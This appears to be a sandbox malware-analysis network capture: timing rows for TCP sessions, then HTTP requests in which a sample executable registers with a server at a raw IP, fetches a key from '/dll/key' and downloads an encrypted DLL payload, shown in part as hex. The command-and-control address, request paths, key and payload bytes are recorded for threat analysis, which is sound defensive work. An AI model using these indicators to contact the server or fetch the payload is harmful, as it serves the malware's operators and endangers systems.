Dec 20, 2024 16:37:53.003034115 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.003117085 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.003154993 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.003205061 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.011120081 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.011213064 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.011225939 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.011254072 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.019020081 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.019104004 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.019360065 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.019419909 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.026997089 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.027034044 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.027065992 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.027090073 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.064889908 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.065041065 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.137592077 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.137670994 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.137753010 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.137840033 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.140908003 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.140968084 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.141100883 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.141146898 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.147346973 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.147404909 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.147519112 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.147655010 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.153966904 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.154022932 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.154289961 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.154333115 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.160289049 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.160377026 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.161087036 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.161134958 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.166054964 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.166121960 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.166142941 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.166182041 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.172699928 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.172805071 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.173537016 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.173589945 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.177825928 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.177872896 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.178267956 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.178325891 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.183721066 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.183793068 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.183801889 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.183845997 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.189667940 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.189728975 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.189795017 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.189838886 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.195441008 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.195499897 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.195714951 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.195839882 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.201442957 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.201514006 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.201555014 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.201600075 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.204868078 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.204919100 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.204922915 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.204962015 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.208417892 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.208456993 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.208508015 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.208529949 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.211819887 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.211875916 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.212035894 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.212083101 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.215262890 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.215337038 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.215512991 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.215564966 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.218832970 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.218889952 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.218905926 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.218959093 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.222259998 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.222316027 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.222392082 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.222438097 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.225830078 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.225894928 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.226103067 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.226150990 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.229372978 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.229435921 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.229492903 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.229542017 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.232995987 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.233055115 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.233308077 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.233356953 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.236287117 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.236378908 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.236773014 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.236820936 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.258409977 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:53.378026009 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.790546894 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:53.790627956 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:55.819197893 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:55.939131021 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:56.648529053 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:56.648646116 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:58.662985086 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:37:58.782972097 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:59.193500042 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:37:59.193648100 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:38:01.209920883 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:38:01.330019951 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:38:02.036369085 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:38:02.036478996 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:38:04.053390026 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:38:04.172966957 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:38:04.619503975 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:38:04.619611979 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:38:06.631625891 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:38:06.751183987 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:38:07.462344885 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:38:07.462409973 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:38:09.475513935 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:38:09.476032972 CET | 49839 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:38:09.595649004 CET | 80 | 49839 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:38:09.595818043 CET | 80 | 49793 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:38:09.595819950 CET | 49839 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:38:09.595885038 CET | 49793 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:38:09.596317053 CET | 49839 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:38:09.715847015 CET | 80 | 49839 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:38:11.019649029 CET | 80 | 49839 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:38:11.019736052 CET | 49839 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:38:13.053987026 CET | 49839 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:38:13.054300070 CET | 49848 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:38:13.177840948 CET | 80 | 49848 | 185.156.73.23 | 192.168.2.5
Dec 20, 2024 16:38:13.179630995 CET | 49848 | 80 | 192.168.2.5 | 185.156.73.23
Dec 20, 2024 16:38:13.179928064 CET | 49848 | 80 | 192.168.2.5 | 185.156.73.23
                                  Dec 20, 2024 16:38:13.195518970 CET8049839185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:13.195643902 CET4983980192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:13.299437046 CET8049848185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:14.601825953 CET8049848185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:14.601999998 CET4984880192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:16.622499943 CET4984880192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:16.623091936 CET4985680192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:16.850523949 CET8049848185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:16.850539923 CET8049856185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:16.850589037 CET4984880192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:16.850655079 CET4985680192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:16.850991011 CET4985680192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:16.970865011 CET8049856185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:18.620090008 CET8049856185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:18.620210886 CET4985680192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:20.666404009 CET4985680192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:20.666766882 CET4986580192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:20.788775921 CET8049865185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:20.788850069 CET4986580192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:20.789423943 CET4986580192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:20.789654016 CET8049856185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:20.789722919 CET4985680192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:20.909574032 CET8049865185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:22.234945059 CET8049865185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:22.235810041 CET4986580192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:24.308217049 CET4986580192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:24.308732033 CET4987480192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:24.428292990 CET8049874185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:24.428333998 CET8049865185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:24.428441048 CET4986580192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:24.428441048 CET4987480192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:24.428765059 CET4987480192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:24.548418999 CET8049874185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:25.862947941 CET8049874185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:25.863049030 CET4987480192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:28.443792105 CET4987480192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:28.563782930 CET8049874185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:28.563874006 CET4987480192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:29.027817011 CET4988680192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:29.147419930 CET8049886185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:29.147522926 CET4988680192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:29.147886038 CET4988680192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:29.268431902 CET8049886185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:31.585056067 CET4988680192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:31.589955091 CET4989380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:31.709496975 CET8049893185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:31.709585905 CET4989380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:31.709904909 CET4989380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:31.724962950 CET4989380192.168.2.5185.156.73.23
                                  Dec 20, 2024 16:38:31.829421997 CET8049893185.156.73.23192.168.2.5
                                  Dec 20, 2024 16:38:31.829499960 CET4989380192.168.2.5185.156.73.23
                                  • 185.156.73.23
                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   0 | 192.168.2.5 | 49793 | 185.156.73.23 | 80 | 4128 | C:\Users\user\Desktop\4kahanaK78.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   Dec 20, 2024 16:37:50.105938911 CET | 414 | OUT | GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: 1
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                   Dec 20, 2024 16:37:51.585705996 CET | 204 | IN | HTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:37:51 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 1
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 30
                                  Data Ascii: 0
                                   Dec 20, 2024 16:37:51.595069885 CET | 388 | OUT | GET /dll/key HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: 1
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                   Dec 20, 2024 16:37:52.120620012 CET | 224 | IN | HTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:37:51 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 21
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                  Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                   Dec 20, 2024 16:37:52.126172066 CET | 393 | OUT | GET /dll/download HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: 1
                                  Host: 185.156.73.23
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                   Dec 20, 2024 16:37:52.747107029 CET | 1236 | IN | HTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 15:37:52 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                  Content-Length: 97296
                                  Keep-Alive: timeout=5, max=98
                                  Connection: Keep-Alive
                                  Content-Type: application/octet-stream
                                  Data Raw: 58 4d 20 a9 34 49 68 99 fe 5d 0a b3 eb 74 b6 26 d0 73 db 11 cf 76 c9 30 7b 06 76 1e 76 73 27 c0 ad eb 3a aa 6c ec 68 b4 13 95 65 19 c0 04 a4 9f 52 d6 da b1 8e f9 31 83 b8 06 72 fc 52 2b 46 6b 2a f7 94 87 96 7e f9 73 f3 a2 8e 06 fa 0b c3 51 a1 b1 0b 1e e4 72 c9 54 ac 62 d5 ed 06 c7 96 dd b1 7e 63 b2 8d 5b 1d 87 0b cf 81 a3 a5 ba ba 3b a3 fc ff 6a ac 40 e8 30 b2 25 84 88 f9 dd 19 78 dd e8 c7 76 cb 77 fb f0 2e a7 1d 3c 72 75 0a 1c 17 d3 59 72 65 3b f4 62 36 1d 14 b2 48 51 2d d4 ec ba cd 38 bf 42 b3 9b 51 82 61 a1 c0 c6 52 bc 3a cc 68 26 72 90 a0 a6 17 be fc 07 3d a2 3b 72 1e 6b e2 0b 54 e2 40 e0 ea b9 d0 e1 6c 8b cf 3b 23 fd 94 33 21 e6 4f b4 00 78 da 7d a1 13 e8 b9 03 f4 00 bb ce 79 27 3c 0a 47 66 51 90 4b af 23 d8 4c 35 76 10 1e 5d d4 b3 01 f6 db 8a 1e 18 de 64 f3 a6 e9 b9 b8 cb fe 4e 7b 65 a0 c7 bc 40 05 fa f3 1e a1 c2 e7 7f 08 cd ec 7f e9 a4 1b b2 f5 41 5c 8e 11 3c bc 74 f3 75 ed 58 15 4f ef 6e c5 e9 5a 89 8e 20 86 58 62 b1 4f 3c 84 2a 5a a5 a4 cf 68 7e 9b 28 b1 57 99 66 af 7a 0d 56 cb 34 09 db 4c [TRUNCATED]
                                  Data Ascii: XM 4Ih]t&sv0{vvs':lheR1rR+Fk*~sQrTb~c[;j@0%xvw.<ruYre;b6HQ-8BQaR:h&r=;rkT@l;#3!Ox}y'<GfQK#L5v]dN{e@A\<tuXOnZ XbO<*Zh~(WfzV4L%50H`syB(IL5s:aS}XM9Jo)'M;n6]Wn)L_e>[RA.'6N.g6IY%h 3r^\b~y/h2ZLku}V<fbD<!_2zoIEP*OuPw#6N&lR}GILYNyzjHy'_5Pd9y+6q*)GcL#5\M5U])U(~HmYG1r4BhP]iM%)q.]~|jbK!N7R}T2bsq1L^!|qD'sLnD@bn%0=bQ1+lQXO|NC.d{08F<Wy{oj3n4eS] KoBH~sh1m86{lsRq~w_;X*#U
                                   Dec 20, 2024 16:37:52.747215986 CET | 1236 | IN | Data Raw: 98 ce 36 6e 99 4f 44 62 54 a0 2b 5a 63 96 17 1c 8e 71 d6 10 c5 90 ce 53 f1 24 2d 53 60 59 54 cc 01 e7 c4 70 93 60 32 41 18 ce 0d 55 c7 24 07 69 64 06 3a b3 b0 e0 76 6e 84 3b d8 aa e7 9e f0 d5 ee 45 9c b1 50 a7 0a df 3f 11 c8 6e 7d 41 c9 76 d2 0f
                                  Data Ascii: 6nODbT+ZcqS$-S`YTp`2AU$id:vn;EP?n}AvLwU|}"Gi9ZIxw.sY-KnP2oWci#2kgDZ6~,o9"opx(uccgv@M)nL
                                   Dec 20, 2024 16:37:52.747234106 CET | 1236 | IN | Data Raw: 44 70 21 ac fa dd 10 12 6c 8f df 8d 2a 52 37 0a bc 2b 32 e0 ca d2 85 4a 5e 2a bb 89 27 6f b7 ed ec 11 16 da 35 88 e8 c7 a0 fb 57 12 bc ee 7b 8e 20 56 98 d0 5f d5 fa 6e b8 a6 bb 07 ab 54 57 ec 21 3a 2e 06 6d 3f c9 25 6c 63 ce e7 5a 5e c2 32 24 bd
                                  Data Ascii: Dp!l*R7+2J^*'o5W{ V_nTW!:.m?%lcZ^2$2[#LeCe+: *rUz(-dFI?[*VH0-!{</Bge!ygJZ=XwPMeh5]Bki'\L4u
                                   Dec 20, 2024 16:37:52.747422934 CET | 1236 | IN | Data Raw: 42 47 80 86 ae 70 77 dd c9 a4 43 ea 79 cc 36 24 d5 a0 a8 68 e2 19 03 24 ed 93 0c db 15 78 2a 88 5a 7c 59 51 fe c6 7c 01 35 8f e1 23 99 84 04 00 e3 d2 e6 6e e4 8f 85 26 21 77 40 81 44 b6 9f 1d 75 1d 8d 68 73 3a 7c 42 46 c1 18 9b 47 fd 90 63 33 b4
                                  Data Ascii: BGpwCy6$h$x*Z|YQ|5#n&!w@Duhs:|BFGc3_^M*H_FJn-U,e?lzR3Ib=nuH_x}q^6vP2'\:)j!gJH:yA".E<tj)>N]
                                   Dec 20, 2024 16:37:52.747440100 CET | 1236 | IN | Data Raw: 65 3b 47 31 40 6c 58 a4 f2 72 e0 62 45 fe 13 75 f3 bf 71 98 82 ed 0b 91 d9 fa 6f fb bb 0c b6 96 17 6c 50 87 9d 6a f0 e3 e5 e5 17 2f 04 e1 78 4b 7b ec a4 0a 66 3a c7 1b de e3 06 f4 33 94 a4 66 e3 66 11 87 2a 50 e7 5f f0 a7 8b 90 b0 e7 20 a1 56 ea
                                  Data Ascii: e;G1@lXrbEuqolPj/xK{f:3ff*P_ VufJJh2~Uz=;6DmjDX,t3{etiOaB?hcMT#iHyKg7`Cx6'JgYOL(>@2O0inol%t-9'
                                   Dec 20, 2024 16:37:52.747458935 CET | 1236 | IN | Data Raw: 18 fc a2 90 2b 67 71 38 68 4e e5 23 79 cf 33 c9 7b 68 89 24 07 d9 65 9b c2 05 5b 73 79 a0 fa 5d 0b 18 e7 03 da 3c 02 9a eb 59 06 94 8c a5 f8 69 3f f6 01 62 ec cb f9 de 45 fa 09 83 a3 f7 21 af d3 6f d5 a4 26 c7 c1 ee 10 d1 cd 23 d9 b7 3d bf ce a7
                                  Data Ascii: +gq8hN#y3{h$e[sy]<Yi?bE!o&#=fmCALA-0BiwXV-+[X>Og{:i{It_v50#xa=cWBd/QFI6N' 3F$R/3Oqt]uqp3GU@(
                                   Dec 20, 2024 16:37:52.747478008 CET | 1236 | IN | Data Raw: 86 d0 0e 0e f5 2b 0b f5 8d f7 79 40 71 81 e1 45 02 36 97 09 61 9b 5f dc b2 b1 d0 95 a0 5d 70 7b 40 b1 c5 76 fa 38 88 2f 7c 5a a9 00 9d 47 93 df 14 da 54 c6 55 b5 fc 8e fd 29 bf 7f d9 f7 52 82 c1 5f b3 a1 7d bb 48 e0 29 38 0d 63 13 83 b6 e2 b0 e0
                                  Data Ascii: +y@qE6a_]p{@v8/|ZGTU)R_}H)8c'ATd10?lg;&jg8KnWwD0a_r+42}20.u~Q$z2i@=sdkO8m(pC
                                   Dec 20, 2024 16:37:52.748111010 CET | 1236 | IN | Data Raw: c3 9c 69 5d eb 54 db 81 bb 6b 66 5e ab f4 9b 3d ee ff 1b d1 4b 71 18 e1 6e 42 a8 ab 9c 98 14 85 99 99 0e a1 66 a6 1c 27 bd 4a b3 a3 d4 cf 6b 2b dc 89 26 b7 59 fe 26 0d 72 54 62 f2 c9 80 5f 45 0d 82 64 28 85 e9 69 0d 69 77 dd df e1 4d 16 de d3 9a
                                  Data Ascii: i]Tkf^=KqnBf'Jk+&Y&rTb_Ed(iiwM3mo.m4moNm09k-:zTzxGc|Ub<|Y>. Tu#f-UM!+g@!4<fG7IkEl
